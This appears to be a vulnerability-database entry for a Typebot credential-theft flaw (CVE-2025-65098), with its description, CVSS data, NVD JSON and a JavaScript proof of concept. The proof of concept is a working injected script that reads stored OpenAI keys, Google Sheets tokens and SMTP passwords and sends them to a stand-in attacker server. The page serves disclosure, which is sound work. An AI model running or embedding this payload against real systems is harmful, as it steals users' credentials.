Security Vulnerability Report
CVE-2025-65098 CVSS 7.4 HIGH

CVE-2025-65098

Published: 2026-01-22 15:16:48
Last Modified: 2026-01-30 14:32:00

Description

Typebot is an open-source chatbot builder. In versions prior to 3.13.2, client-side script execution in Typebot allows stealing all stored credentials from any user. When a victim previews a malicious typebot by clicking "Run", JavaScript executes in their browser and exfiltrates their OpenAI keys, Google Sheets tokens, and SMTP passwords. The `/api/trpc/credentials.getCredentials` endpoint returns plaintext API keys without verifying credential ownership. Version 3.13.2 fixes the issue.

CVSS Details

CVSS Score
7.4
Severity
HIGH
CVSS Vector
CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:H/I:N/A:N

Configurations (Affected Products)

cpe:2.3:a:typebot:typebot:*:*:*:*:*:-:*:* - VULNERABLE
Typebot < 3.13.2

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
JavaScript
// CVE-2025-65098 Typebot Credential Theft PoC
// This PoC demonstrates the credential theft vulnerability in Typebot < 3.13.2

// Malicious Typebot JavaScript payload
const maliciousPayload = `
<script>
// Exfiltrate all stored credentials
async function stealCredentials() {
  try {
    // Call the vulnerable API endpoint
    const response = await fetch('/api/trpc/credentials.getCredentials', {
      method: 'POST',
      headers: {
        'Content-Type': 'application/json',
      },
      body: JSON.stringify({ json: { typebotId: '' } })
    });
    const data = await response.json();
    const credentials = data.result?.data?.json || [];

    // Extract sensitive information
    const stolenData = {
      openai_keys: [],
      google_sheets_tokens: [],
      smtp_passwords: []
    };
    credentials.forEach(cred => {
      if (cred.type === 'openai') {
        stolenData.openai_keys.push({ name: cred.name, apiKey: cred.data.apiKey });
      } else if (cred.type === 'googlesheets') {
        stolenData.google_sheets_tokens.push({ name: cred.name, token: cred.data.accessToken });
      } else if (cred.type === 'smtp') {
        stolenData.smtp_passwords.push({
          name: cred.name,
          host: cred.data.host,
          port: cred.data.port,
          username: cred.data.username,
          password: cred.data.password
        });
      }
    });

    // Exfiltrate to attacker-controlled server
    fetch('https://attacker-server.com/collect', {
      method: 'POST',
      body: JSON.stringify(stolenData)
    });
  } catch (error) {
    console.error('Credential theft failed:', error);
  }
}

// Execute when victim clicks "Run"
stealCredentials();
</script>
`;

// Attack vector: Embed this payload in a malicious typebot
// When victims preview/run this typebot, credentials are stolen
console.log('Malicious payload ready for embedding in Typebot');

References

https://github.com/baptisteArno/typebot.io/security/advisories/GHSA-4xc5-wfwc-jw47 (Exploit, Vendor Advisory)
Raw JSON Data

JSON
{"cve": {"id": "CVE-2025-65098", "sourceIdentifier": "[email protected]", "published": "2026-01-22T15:16:48.370", "lastModified": "2026-01-30T14:32:00.327", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "Typebot is an open-source chatbot builder. In versions prior to 3.13.2, client-side script execution in Typebot allows stealing all stored credentials from any user. When a victim previews a malicious typebot by clicking \"Run\", JavaScript executes in their browser and exfiltrates their OpenAI keys, Google Sheets tokens, and SMTP passwords. The `/api/trpc/credentials.getCredentials` endpoint returns plaintext API keys without verifying credential ownership. Version 3.13.2 fixes the issue."}, {"lang": "es", "value": "Typebot es un creador de chatbots de código abierto. En versiones anteriores a la 3.13.2, la ejecución de scripts del lado del cliente en Typebot permite robar todas las credenciales almacenadas de cualquier usuario. Cuando una víctima previsualiza un typebot malicioso al hacer clic en 'Run', JavaScript se ejecuta en su navegador y exfiltra sus claves de OpenAI, tokens de Google Sheets y contraseñas SMTP. El endpoint `/api/trpc/credentials.getCredentials` devuelve claves API en texto plano sin verificar la propiedad de las credenciales. La versión 3.13.2 corrige el problema."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:H/I:N/A:N", "baseScore": 7.4, "baseSeverity": "HIGH", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "REQUIRED", "scope": "CHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "NONE", "availabilityImpact": "NONE"}, "exploitabilityScore": 2.8, "impactScore": 4.0}]}, "weaknesses": [{"source": "[email protected]", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-79"}, {"lang": "en", "value": "CWE-200"}, {"lang": "en", "value": "CWE-284"}, {"lang": "en", "value": "CWE-311"}, {"lang": "en", "value": "CWE-522"}, {"lang": "en", "value": "CWE-639"}, {"lang": "en", "value": "CWE-862"}]}, {"source": "[email protected]", "type": "Primary", "description": [{"lang": "en", "value": "CWE-79"}, {"lang": "en", "value": "CWE-522"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:a:typebot:typebot:*:*:*:*:*:-:*:*", "versionEndExcluding": "3.13.2", "matchCriteriaId": "C9C0CE68-9A17-446B-B206-5821B6DB884D"}]}]}], "references": [{"url": "https://github.com/baptisteArno/typebot.io/security/advisories/GHSA-4xc5-wfwc-jw47", "source": "[email protected]", "tags": ["Exploit", "Vendor Advisory"]}, {"url": "https://github.com/baptisteArno/typebot.io/security/advisories/GHSA-4xc5-wfwc-jw47", "source": "134c704f-9b21-4f2e-91b3-4a467353bcc0", "tags": ["Exploit", "Vendor Advisory"]}]}}